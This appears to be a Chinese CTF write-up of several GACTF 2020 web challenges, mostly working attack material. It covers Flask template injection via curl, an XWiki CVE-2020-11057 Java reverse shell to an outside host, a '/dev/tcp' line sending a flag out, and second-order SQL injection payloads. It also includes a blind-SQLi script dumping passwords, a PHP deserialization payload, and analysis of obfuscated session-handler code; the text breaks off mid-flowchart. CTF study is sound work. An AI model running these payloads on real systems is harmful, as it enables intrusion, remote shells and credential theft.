    trick = xxxx # trick
    return trick

@app.route('/')
def index():
    # app.txt
@app.route('/eval', methods=["POST"])
def my_eval():
    # post eval
@app.route(xxxxxx, methods=["POST"]) # Secret
def admin():
    # admin requests
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=8080)

PS C:\WINDOWS\System32> curl.exe -X POST http://149.28.226.175:10000/eval -d 'eval=ctf.__globals__' {'my_eval': <function my_eval at 0x7ff4f6b29dd0>, 'app': <Flask 'app_1'>, 'waf_eval': <function waf_eval at 0x7ff4f6b29c50>, 'admin': <function admin at 0x7ff4f6a73650>, 'index': <function index at 0x7ff4f6b29d50>, 'waf_ip': <function waf_ip at 0x7ff4f6b29b50>, '__builtins__': <module '__builtin__' (built-in)>, 'admin_route': '/h4rdt0f1nd_9792uagcaca00qjaf', '__file__': 'app_1.py', 'request': <Request 'http://149.28.226.175:10000/eval' [POST]>, '__package__': None, 'Flask': <class 'flask.app.Flask'>, 'ctf': <function ctf at 0x7ff4f6b29cd0>, 'waf_path': <function waf_path at 0x7ff4f6b29bd0>, 'time': <module 'time' from '/usr/local/lib/python2.7/lib-dynload/time.so'>, '__name__': '__main__', 'requests': <module 'requests' from '/usr/local/lib/python2.7/site-packages/requests/__init__.pyc'>, '__doc__': None}

/h4rdt0f1nd_9792uagcaca00qjaf

https://www.secpulse.com/archives/65832.html

curl.exe -X POST http://149.28.226.175:10000/h4rdt0f1nd_9792uagcaca00qjaf -d  'ip=127.1.1.1&port=5000&path='

from xxxx import flag
app = flask.Flask(__name__)
app.config['FLAG'] = flag
@app.route('/')
def index():
    return open('app.txt').read()
@app.route('/<path:hack>')
def hack(hack):
    return flask.render_template_string(hack)
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=5000)

payload:

ip=127.1.1.1&path={{url_for.__globals__['current_app'].__dict__}}&port=5000

{'subdomain_matching': False, 'error_handler_spec': {}, '_before_request_lock': <thread.lock object at 0x7fca8afb0410>, 'jinja_env': <flask.templating.Environment object at 0x7fca8b1b83d0>, 'before_request_funcs': {}, 'teardown_appcontext_funcs': [], 'shell_context_processors': [], 'after_request_funcs': {}, 'cli': <AppGroup app_2>, '_blueprint_order': [], 'before_first_request_funcs': [], 'view_functions': {'index': <function index at 0x7fca8c1cae50>, 'static': <bound method Flask.send_static_file of <Flask 'app_2'>>, 'hack': <function hack at 0x7fca8b1fcd50>}, 'instance_path': '/app/web2tokensadfafqgqgfaosvbs/instance', 'teardown_request_funcs': {}, 'url_value_preprocessors': {}, 'config': <Config {'JSON_AS_ASCII': True, 'USE_X_SENDFILE': False, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'SESSION_COOKIE_SAMESITE': None, 'PROPAGATE_EXCEPTIONS': None, 'ENV': 'production', 'DEBUG': False, 'SECRET_KEY': None, 'EXPLAIN_TEMPLATE_LOADING': False, 'MAX_CONTENT_LENGTH': None, 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'FLAG': 'GACTF{wuhUwuHu_a1rpl4n3}', 'PREFERRED_URL_SCHEME': 'http', 'JSONIFY_PRETTYPRINT_REGULAR': False, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'TEMPLATES_AUTO_RELOAD': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'JSONIFY_MIMETYPE': 'application/json', 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'TRAP_HTTP_EXCEPTIONS': False}>, '_static_url_path': None, 'template_context_processors': {None: [<function _default_template_ctx_processor at 0x7fca8b1fc550>]}, 'template_folder': 'templates', 'blueprints': {}, 'url_map': Map([<Rule '/' (HEAD, OPTIONS, GET) -> index>, <Rule '/static/<filename>' (HEAD, OPTIONS, GET) -> static>, <Rule '/<hack>' (HEAD, OPTIONS, GET) -> hack>]), 'name': 'app_2', '_got_first_request': True, 'import_name': '__main__', 'root_path': '/app/web2tokensadfafqgqgfaosvbs', '_static_folder': 'static', 'extensions': {}, 'url_default_functions': {}, 'url_build_error_handlers': []}

….我 flask 好像又有点忘了….记得归纳

参考

https://www.mi1k7ea.com/2019/06/02/%E6%B5%85%E6%9E%90Python-Flask-SSTI/

xwiki

CVE-2020-11057

https://jira.xwiki.org/browse/XWIKI-16960

String host="x.x.x.x"; int port=8080; String cmd="/bin/bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

// python的socket 就是连不上。。。。

也可以直接将readflag 上传到自己主机上 cat /readflag > /dev/tcp/x.x.x.x/8080

那个主机上没有: nc scp rsync

后面是逆向,交给队友了

0110011101100001011000110111010001100110011110110101100001010111011010010110101101101001010111110100001101010110010001010101111101110111011010010111010001101000011011110111010101110100010111110111000001100101011100100110110101101001011100110111001101101001011011110110111001011111011100110110001101110010011010010111000001110100011010010110111001100111010111110110010101111000011001010110001101110101011101000110100101101111011011100010000100100001001000010111110
# 二进制转字符串
gactf{XWiki_CVE_without_permission_scripting_execution!!!> 
# 修改
gactf{XWiki_CVE_without_permission_scripting_execution!!!}

carefuleyes

https://www.cnblogs.com/xhds/p/12245175.html

源代码:www.zip

与hitcon-babytrick的基本流程一样:

获取usernam&password->利用username&password来反序列化->get_flag

获取usernam&password

利用的代码 rename.php 二次注入

require_once "common.php";

if (isset($req['oldname']) && isset($req['newname'])) {
    echo "select * from `file` where `filename`='{$req['oldname']}'";
    $result = $db->query("select * from `file` where `filename`='{$req['oldname']}'");

    if ($result->num_rows > 0) {
        $result = $result->fetch_assoc();
        echo "select * from `file` where `filename`='{$result['filename']}'".PHP_EOL;
        $info = $db->query("select * from `file` where `filename`='{$result['filename']}'");
        $info = $info->fetch_assoc();
        echo "oldfilename : ".$info['filename']." will be changed."."\n";
    } else {
        exit("old file doesn't exists!");
    }

    if ($result) {
        echo "before: ".$req['newname']."\n\r";
        $req['newname'] = basename($req['newname']);
        echo "after: ".$req['newname']."\n\r";
        $result['filename'] = addslashes($result['filename']);
        echo "update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}".PHP_EOL;
        $re = $db->query("update `file` set `filename`='{$req['newname']}', `oldname`='{$result['filename']}' where `fid`={$result['fid']}");

这里有一个坑点,在本地复现时,如果用的是win10,basename("\'a\'") return' 而在linux return \'a\'

get: \'1\' //一开始传的值
update `file` set `filename`='\\\'1\\\'', `oldname`='1' where `fid`=11 
> \'1\'   //数据库中存的值
select * from `file` where `filename`='\\\'1\\\''
>  \'1\'  //return $result['filename']
select * from `file` where `filename`='\'1\'' 
> NULL      // $info['filename']

get \\'1\\'  //一开始传的值
update `file` set `filename`='\\\\\'1\\\\\'', `oldname`='1' where `fid`=11
> \\'1\\' //数据库中存的值
select * from `file` where `filename`='\\\\\'1\\\\\''
> \\'1\\'    //return $result['filename']
select * from `file` where `filename`='\\'1\\'';
> error check the manual that corresponds to your MySQL server version for the right syntax to use near '1\\''' at line 1
// 注意此处的 1\\'' 已经超过逃出  ''限制

则 payload

\\' union select password,password,password,password,password from user where privilege= 0x61646d696e ;#\\'
qweqweqwe 
\\' union select username,username,username,username,username from user where privilege= 0x61646d696e ;#\\'
XM

反序列化

<?php
class XCTFGG{
    private $method;
    private $args;

    public function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
   function login() {}
}
$result = urlencode(serialize(new XCTFGG('login',['XM ','qweqweqwe'])));
var_dump($result);

get_flag

POST /upload.php?data=O%3A6%3A%22XCTFGG%22%3A2%3A%7Bs%3A14%3A%22%00XCTFGG%00method%22%3Bs%3A5%3A%22login%22%3Bs%3A12%3A%22%00XCTFGG%00args%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22XM+%22%3Bi%3A1%3Bs%3A9%3A%22qweqweqwe%22%3B%7D%7D HTTP/1.1
Host: 202.182.118.236
Content-Length: 1334
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://202.182.118.236
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rNPfazXNdlq3W4y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4231.0 Safari/537.36 Edg/86.0.615.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://202.182.118.236/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundary8rNPfazXNdlq3W4y
Content-Disposition: form-data; name="upfile"; filename="4.gif"
Content-Type: image/gif

GIF89aó ....省略

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 30 Aug 2020 18:58:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.6.40
Content-Length: 43

upload successfully!GACTF{!QAZxsw2#EDCvfr4}

Y1ng 师傅的脚本学到了❤

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import HackRequests as HR
import requests as req
import random
from urllib.parse import quote as urlencode

def upload(name):
    hack = HR.hackRequests()
    raw = '''POST /upload.php HTTP/1.1
Host: 124.71.191.175
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------257708923430047524191624862316
Origin: http://124.71.191.175
Connection: close
Referer: http://124.71.191.175/
Upgrade-Insecure-Requests: 1

-----------------------------257708923430047524191624862316
Content-Disposition: form-data; name="upfile"; filename="%s.jpg"
Content-Type: image/jpeg

Y1ng
-----------------------------257708923430047524191624862316--
''' % name
    proxy=('127.0.0.1','8080')
    hh = hack.httpraw(raw=raw, ssl=False)

def rename(name):
    url = 'http://124.71.191.175/rename.php'
    data = {
        'oldname' : name,
        'newname' : "bbbbb%d.jpg" % random.randint(1,1000000)
    }
    header = {
        "Content-Type" : "application/x-www-form-urlencoded",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Origin" : "http://124.71.191.175",
        "Upgrade-Insecure-Requests" : "1"
    }
    proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}
    r = req.post(url=url, data=data, headers=header)
    if "Y1ng" in r.text:
        return True
    else: 
        return False

def main():
    sql = "select group_concat(password) from user"
    res = ""
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (low < high):
            name = f"Y1ng' or ascii(substr(({sql}),{i},1))>{mid}#"
            upload(name)
            rename_result = rename(name)
            if rename_result:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32 or mid == 127:
            break
        res += chr(mid)
        print(res)

if __name__ == '__main__':
    main()

babyshop[复现]

python .\git_extract.py http://45.63.19.130:8010/.git/ 获得源代码

https://www.leavesongs.com/PENETRATION/unobfuscated-phpjiami.html

当初这题的init.php直接使我去世,xdebug时因为session问题,一直不行

9月12日复现一波,主要是init.php的调试过程

泪目,还好我源代码没删:

源代码此处就不粘贴了,太多了,感兴趣的老哥可以下载源代码

Link:http://xzaslxr.xyz/wp-content/uploads/2020/09/45.63.19.130_8010.zip

代码格式化

可在格式化网站进行格式化

PHP代码格式化美化-在线PHP代码格式化美化工具 (jsons.cn)

手动分析

已经得到的值

$原 = "chr";
$虚物长度 = "count";
$随缘 = "rand";
$千奇百出 = "余壶血史两恐自扩劫盏铁天";
$来者无惧 = "余壶仍灯两恐尽天";

ctrl h 替换上面的一些参数 , 如$原( => chr(

$虚空之数

$虚空之数 = count($this->大宇) - count($this->大宇);  // $虚空之数 = 0;  count($this->大宇) = 66

function 太古仓 字符串第二维等于输入参数时的第一位的数值

    function 太古仓($圆点)
    {
        global $虚空之数, $虚物长度;//虚物长度 =  66
        for ($内仓侍卫 = $虚空之数; $内仓侍卫 < count($this->大宇); $内仓侍卫++) {
            if ($this->大宇[$内仓侍卫][$虚空之数] == $圆点) {
                return $内仓侍卫;
            }
        }
        return $虚空之数;
    }

$天书, $原, $虚物长度, $异闻录, $实物长度, $寻根, $奇语切片, $出窍, $遮天之术, $虚空之数, $实打实在, $虚无缥缈;

    function 融合()
    {
        global $天书, $原, $虚物长度, $异闻录, $实物长度, $寻根, $奇语切片, $出窍, $遮天之术, $虚空之数, $实打实在, $虚无缥缈;
        $天书 = array("阿尔法", "喝彩", "查理", "三角洲", "回声", "狐步舞", "高尔夫球", "旅馆", "印度", "朱丽叶", "公斤", "利马", "麦克", "十一月", "奥斯卡", "爸爸", "魁北克", "罗密欧", "塞拉", "探戈", "制服", "胜利者", "威士忌", "伦琴射线", "扬基", "祖鲁");
        $实物长度 = 点灯(array("回声", "印度", "狐步舞", "印度", "三角洲", "印度", "十一月", "旅馆", "高尔夫球", "旅馆", "爸爸", "旅馆"));
        $寻根 = 点灯(array("回声", "印度", "狐步舞", "印度", "三角洲", "印度", "喝彩", "印度", "魁北克", "旅馆", "回声", "印度"));
        $奇语切片 = 点灯(array("公斤", "奥斯卡", "利马", "奥斯卡", "朱丽叶", "奥斯卡", "威士忌", "麦克", "公斤", "奥斯卡", "旅馆", "奥斯卡", "探戈", "十一月", "魁北克", "十一月", "利马", "奥斯卡"));
        $出窍 = 点灯(array("印度", "十一月", "朱丽叶", "奥斯卡", "朱丽叶", "奥斯卡", "印度", "十一月", "魁北克", "奥斯卡", "威士忌", "麦克", "旅馆", "奥斯卡", "威士忌", "十一月", "旅馆", "奥斯卡"));
        $遮天之术 = 点灯(array("高尔夫球", "公斤", "狐步舞", "公斤", "旅馆", "利马", "朱丽叶", "公斤", "公斤", "旅馆", "印度", "旅馆", "探戈", "朱丽叶", "印度", "公斤", "朱丽叶", "公斤", "旅馆", "公斤", "探戈", "公斤", "印度", "公斤", "朱丽叶", "公斤"));
        $虚空之数 = count($this->大宇) - count($this->大宇);//
        $实打实在 = count($this->大宇) == count($this->酉戊) / 5 * (11 + 1 + 1) + 1;
        $虚无缥缈 = count($this->大宇) == (count($天书) + 5) / 3 * (2 + 1 + 13);
        $异闻录 = chr($this->太古仓("春")) . chr($this->太古仓("铃"));//
        for ($爆裂 = count($this->大宇) - 1; $爆裂 < count($this->大宇) + count($this->丙午); $爆裂++) { ///count($this->丙午) = 25
            $异闻录 .= chr($爆裂);
        }
        for ($爆裂 = count($this->大宇) / (2 + 1) + count($this->酉午) * (2 + 1); $爆裂 < count($this->支壬) * 5 - 2; $爆裂++) {
            $异闻录 .= chr($爆裂);
        }
        for ($爆裂 = (count($this->庚地) + count($this->大宇)) / 2 + 1; $爆裂 < count($this->大宇) - count($this->辰寅) / (2 + 1); $爆裂++) {
            $异闻录 .= chr($爆裂);
        }
    }
}
    function 点灯($俚语)
{
    global $天书, $虚物长度, $虚空之数, $原;
    $偏离 = count($俚语) % 11;
    $简易之物 = "";
    for ($简易种子 = $虚空之数; $简易种子 < count($俚语) / (1 + 1); $简易种子++) {
        $贾 = $虚空之数;
        for ($另类种子 = $偏离; $另类种子 < $偏离 + 11 + 2 + 2 + 1; $另类种子++) {
            if ($天书[$另类种子] == $俚语[$简易种子 + $简易种子]) {
                $贾 += $另类种子;
                $贾 -= $偏离;
            }
            if ($天书[$另类种子] == $俚语[$简易种子 + $简易种子 + 1]) {
                $贾 += $另类种子 * 2 * 2 * 2 * 2;
                $贾 -= $偏离 * 2 * 2 * 2 * 2;
            }
        }
        $简易之物 .= chr($贾);
    }
    return $简易之物;
}
function print_var_name($var) {
    foreach($GLOBALS as $var_name => $value) {
        if ($value === $var) {
            return $var_name;
        }
    }

    return false;
}

$原 = "chr";
$虚物长度 = "count";
$随缘 = "rand";
$千奇百出 = "余壶血史两恐自扩劫盏铁天";
$来者无惧 = "余壶仍灯两恐尽天";
$虚空之数 = 0;
$fe1w0 = new 造化之神;
$arr = array($天书, $原, $虚物长度, $异闻录, $实物长度, $寻根, $奇语切片, $出窍, $遮天之术, $虚空之数, $实打实在, $虚无缥缈);
for($i=0;$i<count($arr);$i++)
{
    echo print_var_name($arr[$i])." :".$arr[$i].PHP_EOL;
}

$天书=
/home/fe1w0/babyshop/tttttt.php:232:
array(26) {
  [0] =>
  string(9) "阿尔法"
  [1] =>
  string(6) "喝彩"
  [2] =>
  string(6) "查理"
  [3] =>
  string(9) "三角洲"
  [4] =>
  string(6) "回声"
  [5] =>
  string(9) "狐步舞"
  [6] =>
  string(12) "高尔夫球"
  [7] =>
  string(6) "旅馆"
  [8] =>
  string(6) "印度"
  [9] =>
  string(9) "朱丽叶"
  [10] =>
  string(6) "公斤"
  [11] =>
  string(6) "利马"
  [12] =>
  string(6) "麦克"
  [13] =>
  string(9) "十一月"
  [14] =>
  string(9) "奥斯卡"
  [15] =>
  string(6) "爸爸"
  [16] =>
  string(9) "魁北克"
  [17] =>
  string(9) "罗密欧"
  [18] =>
  string(6) "塞拉"
  [19] =>
  string(6) "探戈"
  [20] =>
  string(6) "制服"
  [21] =>
  string(9) "胜利者"
  [22] =>
  string(9) "威士忌"
  [23] =>
  string(12) "伦琴射线"
  [24] =>
  string(6) "扬基"
  [25] =>
  string(6) "祖鲁"
}
$原=
/home/fe1w0/babyshop/tttttt.php:232:
string(3) "chr"
$虚物长度=
/home/fe1w0/babyshop/tttttt.php:232:
string(5) "count"
$异闻录=
/home/fe1w0/babyshop/tttttt.php:232:
string(66) "+=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./0123456789"
$实物长度=
/home/fe1w0/babyshop/tttttt.php:232:
string(6) "strlen"
$寻根=
/home/fe1w0/babyshop/tttttt.php:232:
string(6) "strpos"
$奇语切片=
/home/fe1w0/babyshop/tttttt.php:232:
string(9) "str_split"
$出窍=
/home/fe1w0/babyshop/tttttt.php:232:
string(9) "array_pop"
$遮天之术=
/home/fe1w0/babyshop/tttttt.php:232:
string(13) "base64_decode"
$虚空之数=
/home/fe1w0/babyshop/tttttt.php:232:
int(0)
$实打实在=
/home/fe1w0/babyshop/tttttt.php:232:
bool(true)
$虚无缥缈=
/home/fe1w0/babyshop/tttttt.php:232:
bool(false)

双手造物

function 双手造物($物, $左手, $右手)
{
    造化($物)(造化($左手), 造化($右手));
    var_dump(造化($物));
    var_dump(造化($左手));
    var_dump(造化($右手));
}
双手造物("诊秀倾垫余监血泡披切天夫", "沃乎泡误拢瓜迷物构吨悔沿抹孟扩逃规承舌天", "劫哥沃实");

/home/fe1w0/babyshop/tttttt.php:247:
string(7) "ini_set"
/home/fe1w0/babyshop/tttttt.php:248:
string(14) "display_errors"
/home/fe1w0/babyshop/tttttt.php:249:
string(3) "Off"

造化与使用造化函数混淆的参数

function 造化($奇语) 
{
    global $异闻录, $奇语切片, $虚物长度, $出窍, $虚空之数, $虚无缥缈, $遮天之术,$fe1w0;
    $fe1w0 = $奇语;
    $奇语 = str_split($奇语, 2 + 1);//从第4个开始拆开
    $造化之子 = new 造化之神();
    $翻译果实 = "";
    for ($翻译种子 = $虚空之数; $翻译种子 < $虚物长度($奇语); $翻译种子++) {
        for ($造化种子 = $虚空之数; $造化种子 < $虚物长度($造化之子->大宇); $造化种子++) {
            $造化之孙 = $造化之子->大宇[$造化种子];
            $造化之孙长度 = $虚物长度($造化之孙);
            if ($造化之孙长度 == $虚空之数) {
                continue;
            }
            if ($造化之孙[$造化之孙长度 - 1] == $奇语[$翻译种子]) {
                $翻译果实 .= $异闻录[$造化种子];
                array_pop($造化之子->大宇[$造化种子]);
                break;
            }
        }
    }
    echo print_var_name($fe1w0).":".base64_decode($翻译果实);
    return base64_decode($翻译果实);
}

之后的混淆基本上全是用造化来混淆,可以将混淆的变量名和变量值一同打印分析。

参考的E99p1ant 师傅

<?php
#session_save_path('/var/www/html/babycode/storage');

class 造化之神 {
    // 构造函数
    function __construct() {
        $this->融合();
    }
    function 融合() {
        global $天书,$异闻录,$实物长度,$寻根,$奇语切片,$出窍,$遮天之术,$虚空之数, $实打实在,$虚无缥缈;

        // $虚空之数 = NULL

        $天书=array("阿尔法","喝彩","查理","三角洲","回声","狐步舞","高尔夫球","旅馆","印度","朱丽叶","公斤","利马","麦克","十一月","奥斯卡","爸爸","魁北克","罗密欧","塞拉","探戈","制服","胜利者","威士忌","伦琴射线","扬基","祖鲁");

        $实物长度='strlen';

        $寻根='strpos';

        $奇语切片='str_split';

        $出窍='array_pop';

        $遮天之术='base64_decode';

        $虚空之数=0;

        $实打实在 = true;
        $虚无缥缈 = false;
        $异闻录= '+=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./0123456789';
    }
}

// 上面是加密的构造函数，可以不管
new 造化之神();

$千奇百出="余壶血史两恐自扩劫盏铁天";

$来者无惧="余壶仍灯两恐尽天";

ini_set('display_errors', 'On');

$宝物="冻实史畏言秀倾服沃尽天夫";

class 造齿轮 {
    protected$朝拜圣地;
    protected$贡品;
    protected$圣殿;
    protected$禁地;

    public function __construct() {
        echo '__construct'.PHP_EOL;
        $this->朝拜圣地 = 'storage';
        if(!is_dir($this->朝拜圣地)){
            mkdir($this->朝拜圣地);
        }

        $this->禁地 = array('php', 'flag', 'html', 'htaccess');
    }

    // 检查 Cookie 里是否有黑名单
    public function 挖掘($货物, $食物) {
        echo '挖掘'.PHP_EOL;
        foreach($this->禁地 as $元素) {
            if(stripos(@$_COOKIE[$食物], $元素) !== false) {
                die('invaild ' . $食物);// PHPSESSID
                return false;
            }
        }

        $this->圣殿 = session_id();
        return true;
    }
    #'/proc/self/cwd/'.  '/var/www/html/babycode/'.
    // 写文件
    public function 种植($货物,$食物) {
        echo '种植'.PHP_EOL."$this->贡品".$食物;
        $this->贡品 = $货物;
        return file_put_contents('/var/www/html/babycode/'.$this->朝拜圣地.'/sess_'.$货物,$食物);
    }

    // 读文件
    public function 收获($货物) {
        echo '收获'.PHP_EOL;
        $this->贡品=$货物;
        return (string)@file_get_contents('/var/www/html/babycode/'.$this->朝拜圣地.'/sess_'.$货物);
    }

    public function 总结($货物) {
        echo '总结'.PHP_EOL."$this->货物";
        global$实物长度,$虚无缥缈;
        if(strlen($this->圣殿) <= 0){
            return;
        }
        return file_put_contents(''.$this->朝拜圣地.'/note_'.$this->圣殿,$货物)===$虚无缥缈?$虚无缥缈:true;
    }

    public function 归纳() {
        echo '归纳'.PHP_EOL;
        return (string)@file_get_contents('/var/www/html/babycode/'.$this->朝拜圣地.'/note_'.$this->贡品);
    }

    public function 思考($货物) {
        echo '思考'.PHP_EOL;
        $this->贡品=$货物;
         if(file_exists($this->朝拜圣地.'/sess_'.$货物)) {
            unlink($this->朝拜圣地.'/sess_'.$货物);
        } 
        return true;
    }
    public function 反省($货物) {
        echo '反省'.PHP_EOL;
        foreach(glob($this->朝拜圣地.'/*') as $元素) {
            if(filemtime($元素) + $货物 < time() && file_exists($元素)) {
                unlink($元素);
            }
        }
        return true;
    }
    public function 完毕() {
        echo '完毕'.PHP_EOL;
        return true;
    }

    public function __destruct() {
        echo '__destruct'.PHP_EOL;
        $this->总结($this->归纳());
    }
}
$齿轮=new 造齿轮();
session_set_save_handler(array($齿轮, '挖掘'), array($齿轮, '完毕'), array($齿轮, '收获'), array($齿轮, '种植'), array($齿轮, '反省'), array($齿轮, '完毕'));
session_start();

srand(mktime(0,0,0,0,0,0));

$盛世=array(rand()=>array('alice',0b1),rand()=>array('bob',0b101),rand()=>array('cat',0b10100),rand()=>array('dog',0b1111),rand()=>array('evil',0b101),rand()=>array('flag',0b10011100001111));

function 化缘() {
    return $_SESSION['  '];
}
function 取经() {
    global$盛世;
    $宝藏='[';
    foreach($_SESSION['items'] as $元素){
        $宝藏 .= $盛世[$元素][0].', ';//$宝藏 <= items
    }
    $宝藏.=']';

    return $宝藏;
}
function 念经() {
    global $齿轮;
    return $齿轮->归纳();
}
function 造世() {
    global $盛世;
    $宝藏='';
    foreach($盛世 as $按键=>$元素){
        $宝藏 .=
        '<div class="item"><form method="POST"><div class="form-group">'.
            $元素[0].
        '</div><div class="form-group"><input type="hidden" name="id" value=""'.
            $按键.
        '"><button type="submit" class="btn btn-success">buy (

#039;.$元素[1].')</button></div></form></div>'; } return $宝藏; } global $_POST,$_SESSION,$_COOKIE; if(!isset($_SESSION['balance'])){ $_SESSION['balance'] = 0b1000101110010/2; } if(!isset($_SESSION['items'])){ $_SESSION['items'] = []; } if(!isset($_SESSION['note'])){ $_SESSION['note'] = ''; }; if(isset($_POST['id'])) { if($_SESSION['balance'] >= $盛世[$_POST['id']][1]) { $_SESSION['balance'] = $_SESSION['balance']-$盛世[$_POST['id']][1]; array_push($_SESSION['items'], $_POST['id']);//items <= id echo('<span style="color:green">buy succ!</span>'); } else { echo('<span style="color:red">lack of balance!</span>'); } } var_dump($_POST['note']); if(isset($_POST['note'])) { if(strlen($_POST['note'])<=1<<10) { echo "fuck"; $齿轮->总结(str_replace(array('&','<','>'), array('&','<','">'), $_POST['note'])); echo('<span style="color:green">write succ!</span>'); } else { echo('<span style="color:red">note too long!</span>'); } } ?>

session_set_save_handler

session handler默认启动顺序是session_start分别调用的回调函数。为open read ，然后等待脚本结束，收集$_SESSION(默认在内存中)，然后关闭脚本，然后执行write，写入文件，然后close。

session_set_save_handler("sess_open", "sess_close", "sess_read", "sess_write", "sess_destroy", "sess_gc"); session_set_save_handler(array($齿轮,'挖掘'),array($齿轮,'完毕'),array($齿轮,'收获'),array($齿轮,'种植'),array($齿轮,'反省'),array($齿轮,'完毕'));

从代码脚本分析流程来看,分为两种情况

post note =NULL 为__construct、 挖掘、收获、脚本执行、 __destruct、归纳 、总结 、 种植、完毕
post note =NULL 为__construct、 挖掘、收获、脚本执行、总结、 __destruct、归纳 、总结 、 种植、完毕

执行代码中坑:

如果你在使用解析后的代码时,遇到 file_get_content和file_put_content报错问题,且note可以生成并写入，即输入note后脚本执行加总结可以执行(尝试过程中发现php7.0版本都有这个问题),但之后的归纳 、总结 、 种植无法执行,可以将路径换成/proc/self/cwd/就可以正常执行。

题外话: 这个坑踩了一个下午,一直以为是配置问题,后来想到之前考到的一题中讲到include_once与/x/../proc/self/cwd搭配可以再读一次代码(之前已经包含代码了),于是猜测session_set_save_handler 解析出了问题

具体分析

解题的思路,主要利用原有函数的读写操作和session导致的反序列化(主要是造齿轮类的反序列化),后一部分的原来,可以看这篇文章session serialize

先以正常的读写过程为例

无post_note情况下:

st=>start: __contruct
op1=>operation: 挖掘,检查PHPSESSID是否在黑名单
op2=>operation: 收获,read(storage/sess_PHPSESSID),贡品=货物
op3=>operation: __destruct
op4=>operation: 归纳,read(storage/note_PHPSESSID)
op5=>operation: 总结,write(storage/note_PHPSESSID，归纳),当PHPSESSID为空时,return NULL
op6=>operation: 种植,write(storage/sess_PHPSESSID,session_serialize)
e=>end: 完毕
st->op1->op2->op3->op4->op5->op6->e

有post_note情况下:

st=>start: __contruct
op1=>operation: 挖掘,检查PHPSESSID是否在黑名单
op2=>operation: 收获,read(storage/sess_PHPSESSID),贡品=货物
op7=>operation: 总结,write(storage/note_PHPSESSID,post_note)
op3=>operation: __destruct
op4=>operation: 归纳,read(storage/note_PHPSESSID)
op5=>operation: 总结,write(storage/note_PHPSESSID，归纳),当PHPSESSID为空时,return NULL
op6=>operation: 种植,write(storage/sess_PHPSESSID,session_serialize)
e=>end: 完毕
st->op1->op2->op7->op3->op4->op5->op6->e

有post_id情况下:

st=>start: __contruct
op1=>operation: 挖掘,检查PHPSESSID是否在黑名单
op2=>operation: 收获,read(storage/sess_PHPSESSID),贡品=货物
op7=>operation: 脚本 array_push($_SESSION['items'], $_POST['id'])
op3=>operation: __destruct
op4=>operation: 归纳,read(storage/note_PHPSESSID)
op5=>operation: 总结,write(storage/note_PHPSESSID，归纳),当PHPSESSID为空时,return NULL
op6=>operation: 种植,write(storage/sess_PHPSESSID,session_serialize)
e=>end: 完毕
st->op1->op2->op7->op3->op4->op5->op6->e

漏洞产生:

当file_get_contents和file_put_contents会对/right_path/../path_name、/error_path/../path_name会产生不同的操作

/right_path/../path_name 不会执行
/error_path/../path_name 会执行

即 write(storage/note_fe1w0/../sess_xz)成功

这样我们就可以利用收获函数的session读取,导致造齿轮类反序列化.

具体payload 可以看https://www.anquanke.com/post/id/216289#h3-6,

因为我在复现过程,发现疑惑且无法解答

先放出齿轮类反序列化流程图

st=>start: __contruct
op1=>operation: 挖掘,检查PHPSESSID是否在黑名单
op2=>operation: 收获,read(storage/sess_PHPSESSID),贡品=货物
op7=>operation: 脚本 array_push($_SESSION['items'], $_POST['id'])
op3=>operation: __destruct
op4=>operation: 归纳,read(storage/note_PHPSESSID)
op5=>operation: 总结,write(storage/note_PHPSESSID，归纳),当PHPSESSID为空时,return NULL
op8=>operation: __destruct + 反序列化
